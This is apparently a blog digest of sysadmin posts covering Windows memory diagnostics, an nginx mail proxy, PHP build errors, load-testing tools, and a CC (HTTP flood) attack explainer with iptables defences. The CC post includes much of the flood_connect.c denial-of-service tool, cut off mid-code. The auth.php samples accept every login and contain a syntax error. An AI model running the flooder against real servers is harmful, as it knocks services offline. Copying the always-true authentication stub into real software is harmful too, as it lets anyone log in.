flyinweb's blog - 技术文摘

Diagnosing Windows Memory Problems

shanyiwan@live.com() — Mon, 30 Jan 2012 02:39:19 GMT

Overview

I can remember way back when how amazed I was to order a new desktop computer with 2MB of RAM. Even the days of ordering a server with 64MB of RAM seemed like sooooo much memory. And in case you missed it, those are values in megabytes. Naturally today’s systems are in another class altogether. And while I’d like to think the quality of memory manufacturing has also increased over the years, things can still go wrong.

Failing or faulty memory doesn’t always manifest itself with a huge announcement. In the event that Windows 7 or Windows Server 2008 detects such a problem, it will most likely prompt you to run the Windows Memory Diagnostic tool. But you can also manually run this tool anytime you’d like if you prefer to be a bit more proactive.

Using the Windows Memory Diagnostic Tool

You can manually launch the Windows Memory Diagnostic tool from the Administrator Tools menu short cut. Or if you prefer a command line approach run this:

C:\> mdsched

Alas, there do not appear to be any command line parameters. However you launch it you should get something like Figure 1.

Figure 1 Windows Memory Diagnostic

As the dialog suggests you can either reboot immediately or schedule the diagnostic for the next reboot. Whichever option you choose, upon reboot, the memory diagnostic will launch automatically and begin running. You will see something like Figure 2.

Figure 2 Running Memory Diagnostic

Press F1 to customize the tools. You can modify what tools are run and how many passes. Figure 3 shows the Basic tests that will be run. These tests run pretty quickly.

Figure 3 Basic Memory Tests

Figure 4 shows the Standard tests. This is the default behavior.

Figure 4 Standard Memory Tests

If you prefer a more thorough examination, select the Extended test mix, as shown in Figure 5.

By default, the diagnostic will run two passes, but you can tab down to the Pass Count section and put in a number between 0 and 99. I wish there was a way to set this when configuring the scheduled task, but I have yet to fine one.

Figure 5 Extended Memory Tests

Now, it would be nice to have a more granular selection of tests or even an explanation about what all these acronyms mean. But I guess that’s why we have search engines. In any event, all that really matters is if you pass or fail. Upon completion, the computer will automatically reboot. After you logon, you should get a balloon message in the system tray. It may take a few minutes for it to appear and it will fade away as Figure 6 demonstrates.

Figure 6 Memory Diagnostic Result

But at least I have no issues. You can also check the Windows event log for the results. Open the Event Viewer Management Console and select the System Event Log. Then do a search for MemoryDiagnostics-Results. Or if you’re using PowerShell, run a command like this:

PS C:\> get-eventlog system -after "12/26/2011 12:00PM"
-source Microsoft-Windows-MemoryDiagnostics-Results |
Select EntryType,InstanceID,Message |
format-list
EntryType : Information
InstanceId : 1201
Message : The Windows Memory Diagnostic tested the computer's memory
and detected no errors
EntryType : Information
InstanceId : 1101
Message : The Windows Memory Diagnostic tested the computer's memory
and detected no errors

I’m using the –After parameter to speed up my search to only return results from the last run.

Conclusion

You can run this tool on both Windows 7 and Windows Server 2008. It is a simple tool in some regards but it is free and readily available. I expect most of you will have vendor or OEM supplied tools for this sort of diagnostic, but if not this is a good place to start.

基于nginx的pop3/imap/smtp的反向代理解决方案

shanyiwan@live.com() — Thu, 12 Jan 2012 03:44:05 GMT

1、Using a php script on apache server as the auth backend

Start with the configuration from NginxImapProxyExample. For detail information about different configuration parameters, see the NginxMailCoreModule page.

Your Proxy server for pop/imap is running on 192.168.1.1
You have 2 backend pop/imap servers: 192.168.1.22 and 192.168.1.33
You have a webserver that you will use for the authentication and redirection logic 192.168.1.44.
The authentication script is /mail/auth.php

nginx.conf

user  nobody;  
worker_processes  1;  
error_log  logs/error.log  info;  
pid        logs/nginx.pid;  
 
events {  
  worker_connections  1024;  
  multi_accept on;  
}  
 
mail {  
  auth_http  192.168.1.44:80/mail/auth.php;  
  pop3_capabilities  "TOP"  "USER";  
  imap_capabilities  "IMAP4rev1"  "UIDPLUS";  
 
  server {  
    listen     110;  
    protocol   pop3;  
    proxy      on;  
  }  
 
  server {  
    listen     143;  
    protocol   imap;  
    proxy      on;  
  }  
}

/mail/auth.php

<?php  
/*  
Nginx sends headers as  
Auth-User: somuser  
Auth-Pass: somepass  
On my php app server these are seen as  
HTTP_AUTH_USER and HTTP_AUTH_PASS  
*/ 
if (!isset($_SERVER["HTTP_AUTH_USER"] ) || !isset($_SERVER["HTTP_AUTH_PASS"] )){  
  fail();  
}  
$username=$_SERVER["HTTP_AUTH_USER"] ;  
$userpass=$_SERVER["HTTP_AUTH_PASS"] ;  
$protocol=$_SERVER["HTTP_AUTH_PROTOCOL"] ;  
// default backend port  
$backend_port=110;  
if ($protocol=="imap") {  
  $backend_port=143;  
}  
if ($protocol=="smtp") {  
  $backend_port=25;  
}  
// nginx likes ip address so if your  
// application gives back hostname, convert it to ip address here  
$backend_ip["mailhost01"] ="192.168.1.22";  
$backend_ip["mailhost02"] ="192.168.1.33";  
// Authenticate the user or fail  
if (!authuser($username,$userpass)){  
  fail();  
  exit;  
}  
// Get the server for this user if we have reached so far  
$userserver=getmailserver($username);  
// Get the ip address of the server  
// We are assuming that you backend returns hostname  
// We try to get the ip else return what we got back  
$server_ip=(isset($backend_ip[$userserver]))?$backend_ip[$userserver] :$userserver;  
// Pass!  
pass($server_ip, $backend_port);  
   
//END  
   
   
function authuser($user,$pass){  
  // put your logic here to authen the user to any backend  
  // you want (datbase, ldap, etc)  
  // for example, we will just return true;  
  return true;  
}  
   
function getmailserver($user){  
  // put the logic here to get the mailserver  
  // backend for the user. You can get this from  
  // some database or ldap etc  
  // dummy logic, all users that start with a,c,f and g get mailhost01  
  // the others get mailhost02  
  if in_array(substr($user,0,1), array("a", "c", "f", "g")){  
    return "mailhost01";  
  } else {  
    return "mailhost02";  
  }  
}  
   
function fail(){  
  header("Auth-Status: Invalid login or password");  
  exit;  
}  
   
function pass($server,$port){  
  header("Auth-Status: OK");  
  header("Auth-Server: $server");  
  header("Auth-Port: $port");  
  exit;  
}  
?>

Retrieved from "http://wiki.nginx.org/index.php?title=ImapAuthenticateWithApachePhpScript&oldid=178"

2、基于nginx的pop3/imap/smtp的反向代理解决方案

本文介绍基于nginx的邮局反向代理配置方案。nginx对来源于客户端的pop3/smtp/imap请求予以转发到后端postfix，后端邮件服务器采用postfix 2.8.0，已配置并正常运行。

配置nginx.conf：

#user nobody;
worker_processes 1;
error_log logs/error.log info;
events {
worker_connections 1024;
}
mail {
auth_http 指定IP:80/auth.php;
pop3_capabilities "TOP" "USER";
imap_capabilities "IMAP4rev1" "UIDPLUS";

server {
listen 110;
protocol pop3;
proxy on;
}
server {
listen 143;
protocol imap;
proxy on;
}
server {
listen 25;
protocol smtp;
proxy on;
smtp_auth login plain;
xclient off;
}
}

说明：
1.安装nginx时禁掉了http（–without-http），因为我们的目标只是转发pop3/smtp/imap请求，故nginx.conf也是相当简单，只有mail模块。如果还需要代理80端口（例如webmail），可以自行编译对http的支持。

2.smtp的配置模块里必须加入xclient off，否则当nginx向后转发smtp请求时，postfix将报“lost connection after XCLIENT”，同时nginx报“550 5.7.0 Error: insufficient authorization”. nginx对smtp的代理，与pop3/imap是不同的，详细见后文。

3.指定IP是用于认证的，需要放认证脚本auth.php. 认证脚本的作用就是验证用户和密码，一般自定义，可以放在任意的服务器上。本方案中选择放在后端邮件服务器上，便于管理。

这里有一个问题，postfix本身已经集成了认证机制（本人采用的是cyrus sasl2+courier-authlib），为什么加了反向代理，认证过程就要移动到反向代理上呢？这样岂不是就变成非透明代理了吗？为什么不作纯碎的透明代理呢？
根据测试，如果这个认证脚本不设验证，直接透传所有pop3/imap请求到后端，在后端邮件服务器还会进行一次认证，但是对于smtp请求，将不再认证，而直接按照转发规则进行转发（因为反向代理的ip加到了postfix的mynetworks中，见后文）。这两种不同的差异应该是跟协议有关。
为了保持统一，在本文的方案中，auth.php集成了pop3/imap/smtp的三种认证。这样的功能架构类似于游戏服务器的，登录服务器和游戏服务器是分开的。

4.在邮件服务器postfix/etc/main.cf中，修改mynetworks值，加入本反向代理的ip，并重载postfix：postfix -s reload

关于xclient：xclient的作用，是将前端的服务器模拟作为一个邮件客户端，而向后端的postfix进行认证和执行发送，但是postfix还需要一个打patch才能完美支持xclient。
关于此问题的讨论可以参见 http://forum.nginx.org/read.php?2,173197,173246#msg-173246

auth.php：

<?php
/**
* @see xiabaibai.net
*/
if(!isset($_SERVER ["HTTP_AUTH_USER"] ) || ! isset($_SERVER ["HTTP_AUTH_PASS"] )) {
fail(0);
}
$username = $_SERVER ["HTTP_AUTH_USER"];
$userpass = $_SERVER ["HTTP_AUTH_PASS"];
$protocol = $_SERVER ["HTTP_AUTH_PROTOCOL"];
$backend_port = 110;
if($protocol == "imap") {
$backend_port = 143;
} elseif ($protocol == "smtp") {
$backend_port = 25;
}
list($uid, $domain) = explode("@", $username);
$auth = authuser($username, $userpass);
if(!$auth) fail (-2);
pass($_SERVER["SERVER_ADDR"], $backend_port);
//自定义认证，sql查询或者api
function authuser($user, $pass) {
return true;
}
function fail($code) {
switch($code){
case 0: header("Auth-Status: Parameter lost"); break;
case -1: header("Auth-Status: No Back-end Server"); break;
case -2: header("Auth-Status: Invalid login or password" ); break;
}
exit();
}
function pass($server, $port) {
header("Auth-Status: OK" );
header("Auth-Server: $server" );
header("Auth-Port: $port" );
exit();
}

?>

PHP编译错误及其解决方案

shanyiwan@live.com() — Wed, 11 Jan 2012 07:48:36 GMT

本专题主题收集PHP编译过程中的错误及其解决方案。
1、编译php出错
/php-5.3.2/ext/fileinfo/libmagic/apprentice.c:147:internal compiler error:Segmentation fault
Please submit a full bug report,
with preprocessed source if appropriate.
See <URL:http://bugzilla.redhat.com/bugzilla> for instructions.
The bug is not reproducible,so it is likely a hardware or OS problem.
make:*** [ext/fileinfo/libmagic/apprentice.lo] Error 1
解决方法：内存大于1G即可，这是php5.3.2的一个bug
--------------------------------------------------------------------
2、重新构造configure文件出错
./buildconf --force
Forcing buildconf
buildconf:checking installation…
buildconf:autoconf version 2.59 （ok）
buildconf:Your version of autoconf likely contains buggy cache code.
Running vcsclean for you.
To avoid this,install autoconf-2.13.
Can't figure out your VCS, not cleaning.
解决方法：编译安装autoconf-2.13
再将autoconf-2.13的auotconf文件至/usr/local/autoconf

--------------------------------------------------------------------
3、编译时缺少库
configure: error: libXpm.（a|so） not found.
解决方法：yum install libXpm-devel
--------------------------------------------------------------------
4、编译时缺少gmp.h文件
configure: error: Unable to locate gmp.h
解决方法：yum install gmp-devel
--------------------------------------------------------------------
5、Configure: error: xml2-config not found. Please check your libxml2 installation.
解决方法：
#yum install libxml2 libxml2-devel （For Redhat & Fedora）
# aptitude install libxml2-dev      （For ubuntu）
--------------------------------------------------------------------
6、Checking for pkg-config… /usr/bin/pkg-config
configure: error: Cannot find OpenSSL’s <evp.h>
解决方法：
#yum install openssl openssl-devel
--------------------------------------------------------------------
7、Configure: error: Please reinstall the BZip2 distribution
解决方法：
# yum install bzip2 bzip2-devel
--------------------------------------------------------------------
8、Configure: error: Please reinstall the libcurl distribution -
easy.h should be in <curl-dir>/include/curl/
解决方法：
# yum install curl curl-devel   （For Redhat & Fedora）
# install libcurl4-gnutls-dev    （For Ubuntu）
--------------------------------------------------------------------
9、Configure: error: libjpeg.（also） not found.
解决方法：
# yum install libjpeg libjpeg-devel
--------------------------------------------------------------------
10、Configure: error: libpng.（also） not found.
--------------------------------------------------------------------
解决方法：
# yum install libpng libpng-devel
--------------------------------------------------------------------
11、Configure: error: freetype.h not found.
解决方法：
#yum install freetype-devel
--------------------------------------------------------------------
12、Configure: error: Unable to locate gmp.h
解决方法：
# yum install gmp-devel
--------------------------------------------------------------------
13、Configure: error: Cannot find MySQL header files under /usr.
Note that the MySQL client library is not bundled anymore!
解决方法：
# yum install mysql-devel            （For Redhat & Fedora）
# apt-get install libmysql++-dev      （For Ubuntu）
--------------------------------------------------------------------
14、Configure: error: Please reinstall the ncurses distribution
解决方法：
# yum install ncurses ncurses-devel
--------------------------------------------------------------------
15、Checking for unixODBC support… configure: error: ODBC header file ‘/usr/include/sqlext.h’ not found!
解决方法：
# yum install unixODBC-devel
--------------------------------------------------------------------
16、Configure: error: Cannot find pspell
解决方法：
# yum install pspell-devel
--------------------------------------------------------------------
17、configure: error: mcrypt.h not found. Please reinstall libmcrypt.
解决方法：
# yum install libmcrypt libmcrypt-devel    （For Redhat & Fedora）
# apt-get install libmcrypt-dev
--------------------------------------------------------------------
18、Configure: error: snmp.h not found. Check your SNMP installation.
解决方法：
# yum install net-snmp net-snmp-devel
--------------------------------------------------------------------
19、configure:error:Cannot find ldap.h
解决方法：
#yum install openldap-devel openldap

20、configure:error:xslt-config not found. Please reinstall the libxslt >= 1.1.0 distribution
解决方法：
#yum install libxslt libxslt-devel

21、checking for libevent >=1.4.11 install prefix… configure: error: Could not find libevent >=1.4.11 in /usr/local/php
解决方法：
安装libevent-1.4.11以上版本至/usr/local
tar xzvf libevent-1.4.14-stable.tar.gz
cd libevent-1.4.14-stable
./configure --prefix=/usr/local
make&&make install
在编译。/configure时添加--with-libevent-dir=/usr/local即可

22、cc1: out of memory allocating 2036 bytes after a total of 81846272 bytes
make: *** [ext/date/lib/parse_date.lo] Error 1
报错：
/usr/bin/ld: cannot find -lltdl
collect2: ld returned 1 exit status
make:*** [sapi/fpm/php-fpm] Error 1
解决方法：
安装ltdl
#cd /libmcrypt-2.5.7/libltdl/
#./configure --enable-ltdl-install
#ldconfig
#cd php-5.3.6
#make ZEND_EXTRA_LIBS='-liconv'

23、configure: error: utf8_mime2text() has new signature, but U8T_CANONICAL is missing.
yum install libc-client-devel

24、libiconv相关的未定义引用

/libxmlrpc/encoding.c:101:undefined reference to 'libiconv_close'
collect2: ld returned 1 exit status
make:*** [sapi/fpm/php-fpm] Error 1
解决方法：
#make ZEND_EXTRA_LIBS='-liconv'

/usr/local/src/php-5.2.17/ext/iconv/iconv.c:2615: undefined reference to `libiconv'
/usr/local/src/php-5.2.17/ext/iconv/iconv.c:2537: undefined reference to `libiconv'
ext/iconv/.libs/iconv.o: In function `php_iconv_stream_filter_ctor':
/usr/local/src/php-5.2.17/ext/iconv/iconv.c:2491: undefined reference to `libiconv_open'
collect2: ld returned 1 exit status
make: *** [sapi/cli/php] Error 1

原因：可能是由于系统中手工编译了libiconv

解决办法：
./configure ............
vi Makefile
找到下面这行：
EXTRA_LIBS = -lcrypt ...在最后添加-liconv保存

make
make instal

Web服务器性能/压力测试工具

shanyiwan@live.com() — Fri, 09 Dec 2011 03:59:25 GMT

一、http_load

程序非常小，解压后也不到100K

http_load以并行复用的方式运行，用以测试web服务器的吞吐量与负载。但是它不同于大多数压力测试工具，它可以以一个单一的进程运行，一般不会把客户机搞死。还可以测试HTTPS类的网站请求。

下载地址：http://soft.vpser.net/test/http_load/http_load-12mar2006.tar.gz
安装很简单
#tar zxvf http_load-12mar2006.tar.gz
#cd http_load-12mar2006
#make && make install

命令格式：http_load -p 并发访问进程数 -s 访问时间需要访问的URL文件参数其实可以自由组合，参数之间的选择并没有什么限制。比如你写成http_load -parallel 5 -seconds

300 urls.txt也是可以的。我们把参数给大家简单说明一下。
-parallel 简写-p ：含义是并发的用户进程数。
-fetches 简写-f ：含义是总计的访问次数
-rate 简写-p ：含义是每秒的访问频率
-seconds简写-s ：含义是总计的访问时间

准备URL文件：urllist.txt，文件格式是每行一个URL，URL最好超过50－100个测试效果比较好.文件格式如下：
http://www.vpser.net/uncategorized/choose-vps.html
http://www.vpser.net/vps-cp/hypervm-tutorial.html
http://www.vpser.net/coupons/diavps-april-coupons.html
http://www.vpser.net/security/vps-backup-web-mysql.html
例如：

http_load -p 30 -s 60 urllist.txt
参数了解了，我们来看运行一条命令来看看它的返回结果
命令：% ./http_load -rate 5 -seconds 10 urls说明执行了一个持续时间10秒的测试，每秒的频率为5。

49 fetches, 2 max parallel, 289884 bytes, in 10.0148 seconds5916 mean bytes/connection4.89274

fetches/sec, 28945.5 bytes/secmsecs/connect: 28.8932 mean, 44.243 max, 24.488 minmsecs/first

-response: 63.5362 mean, 81.624 max, 57.803 minHTTP response codes: code 200 -- 49

结果分析：
1．49 fetches, 2 max parallel, 289884 bytes, in 10.0148 seconds
说明在上面的测试中运行了49个请求，最大的并发进程数是2，总计传输的数据是289884bytes，运行的时间是10.0148秒
2．5916 mean bytes/connection说明每一连接平均传输的数据量289884/49=5916
3．4.89274 fetches/sec, 28945.5 bytes/sec
说明每秒的响应请求为4.89274，每秒传递的数据为28945.5 bytes/sec
4．msecs/connect: 28.8932 mean, 44.243 max, 24.488 min说明每连接的平均响应时间是28.8932 msecs

，最大的响应时间44.243 msecs，最小的响应时间24.488 msecs
5．msecs/first-response: 63.5362 mean, 81.624 max, 57.803 min
6、HTTP response codes: code 200 -- 49 说明打开响应页面的类型，如果403的类型过多，那可能

要注意是否系统遇到了瓶颈。
特殊说明：
测试结果中主要的指标是 fetches/sec、msecs/connect 这个选项，即服务器每秒能够响应的查询次数，

用这个指标来衡量性能。似乎比 apache的ab准确率要高一些，也更有说服力一些。
Qpt-每秒响应用户数和response time，每连接响应用户时间。
测试的结果主要也是看这两个值。当然仅有这两个指标并不能完成对性能的分析，我们还需要对服务器的

cpu、men进行分析，才能得出结论

二、webbench

webbench是Linux下的一个网站压力测试工具，最多可以模拟3万个并发连接去测试网站的负载能力。下载

地址可以到google搜，我这里给出一个
下载地址：http://soft.vpser.net/test/webbench/webbench-1.5.tar.gz
这个程序更小，解压后不到50K，呵呵
安装非常简单
#tar zxvf webbench-1.5.tar.gz
#cd webbench-1.5
#make && make install
会在当前目录生成webbench可执行文件，直接可以使用了

用法：

webbench -c 并发数 -t 运行测试时间 URL
如：
webbench -c 5000 -t 120 http://www.vpser.net/

三、ab
ab是apache自带的一款功能强大的测试工具
安装了apache一般就自带了，
用法可以查看它的说明

$ ./ab
./ab: wrong number of arguments
Usage: ./ab [options] [http://]hostname[:port]/path
Options are:
-n requests Number of requests to perform
-c concurrency Number of multiple requests to make
-t timelimit Seconds to max. wait for responses
-p postfile File containing data to POST
-T content-type Content-type header for POSTing
-v verbosity How much troubleshooting info to print
-w Print out results in HTML tables
-i Use HEAD instead of GET
-x attributes String to insert as table attributes
-y attributes String to insert as tr attributes
-z attributes String to insert as td or th attributes
-C attribute Add cookie, eg. 'Apache=1234. (repeatable)
-H attribute Add Arbitrary header line, eg. 'Accept-Encoding: gzip'
Inserted after all normal header lines. (repeatable)
-A attribute Add Basic WWW Authentication, the attributes
are a colon separated username and password.
-P attribute Add Basic Proxy Authentication, the attributes
are a colon separated username and password.
-X proxy:port Proxyserver and port number to use
-V Print version number and exit
-k Use HTTP KeepAlive feature
-d Do not show percentiles served table.
-S Do not show confidence estimators and warnings.
-g filename Output collected data to gnuplot format file.
-e filename Output CSV file with percentages served
-h Display usage information (this message)
参数众多，一般我们用到的是-n 和-c
例如：
./ab -c 1000 -n 100 http://www.vpser.net/index.php

这个表示同时处理1000个请求并运行100次index.php文件.
四、Siege
一款开源的压力测试工具，可以根据配置对一个WEB站点进行多用户的并发访问，记录每个用户所有请求过程的相应时间，并在一定数量的并发访问下重复进行。
官方：http://www.joedog.org/
Siege下载：http://soft.vpser.net/test/siege/siege-2.67.tar.gz
解压：
# tar -zxf siege-2.67.tar.gz
进入解压目录：
# cd siege-2.67/
安装：
#./configure ; make
#make install

使用
siege -c 200 -r 10 -f example.url
-c是并发量，-r是重复次数。 url文件就是一个文本，每行都是一个url，它会从里面随机访问的。

example.url内容:

http://www.licess.cn
http://www.vpser.net
http://soft.vpser.net

结果说明
Lifting the server siege… done.
Transactions: 3419263 hits //完成419263次处理
Availability: 100.00 % //100.00 % 成功率
Elapsed time: 5999.69 secs //总共用时
Data transferred: 84273.91 MB //共数据传输84273.91 MB
Response time: 0.37 secs //相应用时1.65秒：显示网络连接的速度
Transaction rate: 569.91 trans/sec //均每秒完成 569.91 次处理：表示服务器后
Throughput: 14.05 MB/sec //平均每秒传送数据
Concurrency: 213.42 //实际最高并发数
Successful transactions: 2564081 //成功处理次数
Failed transactions: 11 //失败处理次数
Longest transaction: 29.04 //每次传输所花最长时间
Shortest transaction: 0.00 //每次传输所花最短时间

cc攻击设置及其防范

shanyiwan@live.com() — Wed, 07 Dec 2011 09:05:35 GMT

一、什么是CC攻击：利用大量代理服务器对目标计算机发起大量连接，导致目标服务器资源枯竭造成拒绝服务。

1、攻击原理

CC主要是用来攻击页面的。大家都有这样的经历，就是在访问论坛时，如果这个论坛比较大，访问的人比较多，打开页面的速度会比较慢，对不？！一般来说，访问的人越多，论坛的页面越多，数据库就越大，被访问的频率也越高，占用的系统资源也就相当可观，现在知道为什么很多空间服务商都说大家不要上传论坛，聊天室等东西了吧。
一个静态页面不需要服务器多少资源，甚至可以说直接从内存中读出来发给你就可以了，但是论坛就不一样了，我看一个帖子，系统需要到数据库中判断我是否有读读帖子的权限，如果有，就读出帖子里面的内容，显示出来——这里至少访问了2次数据库，如果数据库的体积有200MB大小，系统很可能就要在这200MB大小的数据空间搜索一遍，这需要多少的CPU资源和时间？如果我是查找一个关键字，那么时间更加可观，因为前面的搜索可以限定在一个很小的范围内，比如用户权限只查用户表，帖子内容只查帖子表，而且查到就可以马上停止查询，而搜索肯定会对所有的数据进行一次判断，消耗的时间是相当的大。

CC就是充分利用了这个特点，模拟多个用户（多少线程就是多少用户）不停的进行访问（访问那些需要大量数据操作，就是需要大量CPU时间的页面）。很多朋友问到，为什么要使用代理呢？因为代理可以有效地隐藏自己的身份，也可以绕开所有的防火墙，因为基本上所有的防火墙都会检测并发的TCP/IP连接数目，超过一定数目一定频率就会被认为是Connection-Flood。

使用代理攻击还能很好的保持连接，我们这里发送了数据，代理帮我们转发给对方服务器，我们就可以马上断开，代理还会继续保持着和对方连接（我知道的记录是有人利用2000个代理产生了35万并发连接）。

可能很多朋友还不能很好的理解，我来描述一下吧。我们假设服务器A对Search.asp的处理时间需要0.01S（多线程只是时间分割，对结论没有影响），也就是说他一秒可以保证100个用户的Search请求，服务器允许的最大连接时间为60s，那么我们使用CC模拟120个用户并发连接，那么经过1分钟，服务器的被请求了7200次，处理了6000次，于是剩下了1200个并发连接没有被处理。有的朋友会说：丢连接！丢连接！问题是服务器是按先来后到的顺序丢的，这1200个是在最后10秒的时候发起的，想丢？！还早，经过计算，服务器满负开始丢连接的时候，应该是有7200个并发连接存在队列，然后服务器开始120个/秒的丢连接，我们发动的连接也是120个/秒，服务器永远有处理不完的连接，服务器的CPU 100%并长时间保持，然后丢连接的60秒服务器也判断处理不过来了，新的连接也处理不了，这样服务器达到了超级繁忙状态。

蝴蝶：我们假设服务器处理Search只用了0.01S，也就是10毫秒（这个速度你可以去各个有开放时间显示的论坛看看），我们使用的线程也只有120，很多服务器的丢连接时间远比60S长，我们的使用线程远比120多，可以想象可怕了吧，而且客户机只要发送了断开，连接的保持是代理做的，而且当服务器收到SQL请求，肯定会进入队列，不论连接是否已经断开，而且服务器是并发的，不是顺序执行，这样使得更多的请求进入内存请求，对服务器负担更大。

当然，CC也可以利用这里方法对FTP进行攻击，也可以实现TCP-FLOOD，这些都是经过测试有效的。

二、防范

1、解决CC的切入点:
1) 大部分的HTTP代理服务器代理源client向服务器发出的数据包带有"X-Forwarded-For"特征。

2) 针对CC攻击非HTTP端口的时候可以通过过滤HTTP请求特有的"GET"特征进行过滤。

3) 对付CC攻击,区别非正常连接要在代理服务器和被攻击的服务器完成三次握手进行数据通讯的时候进行检测。检测出后要及时关闭服务器相应的非正常连接。否则同样可能因死连接过多造成服务器资源枯竭。

4) 限制单位时间内同一请求IP的并发连接数也不失为一种好的办法。

5) 大部分代理服务器会向服务器报露源请求的源IP地址，只不过这个地址经常是反的例如202.96.140.77你收到所的数据包可能变成77.140.96.202，这可能是程序员没有将网络字节序转换成主机字节序放在HTTP请求信息里所致。找出什么IP攻击你解决办法要你自己想。

2、以上所讲的不一定能帮助普通用户解决实际问题，以下给普通用户一些简单的解决提示:

1）Linux的iptables可以配置字符串模式匹配,也就是可以利用iptables实现解决CC的切入点1、2。将linux配置为桥模式实现对被攻击的非linux服务器保护。可以参考下(用IPTables实现字符串模式匹配

2）很多unix防火墙都带了限制单一ip并发数的功能。例如ipfw

3）如果是针对WEB网站攻击可以采取一些退让的办法比方说域名转向(把负载交给域名转向服务商)。也可以通过反响代理或者dns轮询提高web服务整体承受能力。

注意：字符串匹配本身就是一个开销很大的工作，iptables用来解决CC攻击性能上并不是非常的出色。我可以给一些有开发能力的用户一些提示，以上提及的关键字均出现在三次握手结束后的第四次数据通讯中，且均在TCP数据部分的前255bytes。

3、使用iptables防范CC攻击

当apache站点受到严重的cc攻击，我们可以用iptables来防止web服务器被CC攻击，实现自动屏蔽IP的功能。
1．系统要求

(1)LINUX 内核版本：2.6.9-42ELsmp或2.6.9-55ELsmp（其它内核版本需要重新编译内核，比较麻烦，但是也是可以实现的）。

(2)iptables版本：1.3.7

2. 安装

安装iptables1.3.7和系统内核版本对应的内核模块kernel-smp-modules-connlimit

3. 配置相应的iptables规则

示例如下：

(1)控制单个IP的最大并发连接数
iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 50 -j REJECT

#允许单个IP的最大连接数为 30

(2)控制单个IP在一定的时间（比如60秒）内允许新建立的连接数
iptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --update --seconds 60 --hitcount 30 -j REJECT iptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --set -j ACCEPT

#单个IP在60秒内只允许最多新建30个连接

4. 验证

（1）工具：flood_connect.c（用来模拟攻击)

/*  
 * Flood Connecter v1.5 (c) 2002 by van Hauser / THC <vh@reptile.rug.ac.be>  
 * http://www.thehackerschoice.com  
 *  
 * Connection flooder, can also send data, keep connections open etc.  
 *  
 * Use allowed only for legal purposes.  
 *  
 * To compile:   cc -o flood_connect -O2 flood_connect.c  
 * openssl: cc -o flood_connect -O2 flood_connect.c -DOPENSSL -lssl -lcrypto  
 *  
 */ 
 
#include <stdio.h>  
#include <string.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <netinet/tcp.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <sys/stat.h>  
#include <sys/time.h>  
#include <sys/resource.h>  
#include <arpa/inet.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <fcntl.h>  
#include <signal.h>  
 
#define PORT        80  // change this if you want  
#define UNLIMITED   0   // dont change this  
 
#ifdef OPENSSL  
 #include <openssl/ssl.h>  
 #include <openssl/err.h>  
 SSL     *ssl = NULL;  
 SSL_CTX *sslContext = NULL;  
 RSA     *rsa = NULL;  
 
 RSA *ssl_temp_rsa_cb(SSL *ssl, int export, int keylength) {  
    if (rsa == NULL)  
        rsa = RSA_generate_key(512, RSA_F4, NULL, NULL);  
    return rsa;  
 }  
#endif  
 
char *prg;  
int   forks = 0;  
int   pids[256];  
int   warn = 0;  
 
void help() {  
    printf("Flood Connect v1.5 (c) 2002 by van Hauser /THC <vh@reptile.rug.ac.be>  
 
Syntax: %s [-S] [-u] [-p port] [-i file] [-n connects] [-N delay] [-c] [-C delay] [-d] [-D delay] [-e] [-k] [-v] TARGET  
 
Options:  
    -S           use SSL after TCP connect (not usuable with -u, sets port=443)  
    -u           use UDP protocol (default: TCP) (not usable with -c)  
    -p port      port to connect to (default: %d)  
    -f forks     number of forks to additionally spawn (default: 0)  
    -i file      data to send to the port (default: none)  
    -n connects  maximum number of connects (default: unlimited)  
    -N delay     delay between connects in ms (default: 0)  
    -c           close after connect (and sending data, if used with -i)  
                 use twice to shutdown SSL sessions hard (-S -c -c)  
    -C delay     delay before closing the port (for use with -c) (default: 0)  
    -d           dump data read from server  
    -D delay     delay before trying to read+dump data from server (default: 0)  
    -e           stop when no more connects possible (default: retry forever)  
    -k           no keep-alive after finnishing with connects, terminate!  
    -v           verbose mode  
    TARGET       target to flood attack (ip or dns)  
 
Connection flooder. Nothing more to say. Use only allowed for legal purposes.  
Visit our homepage at http://www.thehackerschoice.com  
", prg, PORT);  
    exit(-1);  
}  
 
void kill_children(int signo) {  
    int i = 0;  
    while (i < forks) {  
        kill(pids[i], SIGTERM);  
        i++;  
    }  
    usleep(10000);  
    i = 0;  
    while (i < forks) {  
        kill(pids[i], SIGKILL);  
        i++;  
    }  
    exit(-1);  
}  
 
int main(int argc, char *argv[]) {  
    unsigned short int  port = PORT;  
    long int max_connects = UNLIMITED;  
    int      verbose = 0;  
    int      close_connection = 0;  
    int      exit_on_sock_error = 0;  
    int      use_ssl = 0;  
    int      keep_alive = 1;  
    int      debug = 0;  
    int      dump = 0;  
    long int connect_delay = 0, close_delay = 0, dump_delay = 0;  
    char    *infile = NULL;  
    struct   stat st;  
    FILE    *f = NULL;  
    char    *str = NULL;  
    int      str_len = 0;  
    int      i;  
    int      s;  
    int      ret;  
    int      err;  
    int      client = 0;  
    int      reads;  
    int      sock_type = SOCK_STREAM;  
    int      sock_protocol = IPPROTO_TCP;  
    char     buf[8196];  
    long int count, successful;  
    struct sockaddr_in target;  
    struct hostent    *resolv;  
    struct rlimit      rlim;  
    int      pidcount = 0, res = 0;  
 
    prg = argv[0];  
    err = 0;  
 
    if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)  
        help();  
 
    while ((i = getopt(argc, argv, "cf:C:dD:N:ei:kn:p:SuvV")) >= 0) {  
        switch (i) {  
            case 'c': close_connection++; break;  
            case 'f': forks = atoi(optarg); break;  
            case 'N': connect_delay = atol(optarg); break;  
            case 'C': close_delay = atol(optarg); break;  
            case 'D': dump_delay = atol(optarg); break;  
            case 'd': dump = 1; break;  
            case 'e': exit_on_sock_error = 1; break;  
            case 'u': sock_type = SOCK_DGRAM;  
                      sock_protocol = IPPROTO_UDP;  
                      break;  
            case 'v': verbose = 1; break;  
            case 'V': debug = 1; break;  
            case 'i': infile = optarg; break;  
            case 'k': keep_alive = 0; break;  
            case 'n': max_connects = atol(optarg); break;  
            case 'S': use_ssl = 1;  
                      if (port == PORT)  
                          port = 443;  
#ifndef OPENSSL  
                      fprintf(stderr, "Error: Not compiled with openssl support, use -DOPENSSL -lssl\n");  
                      exit(-1);  
#endif  
                      break;  
            case 'p': if (atoi(optarg) < 1 || atoi(optarg) > 65535) {  
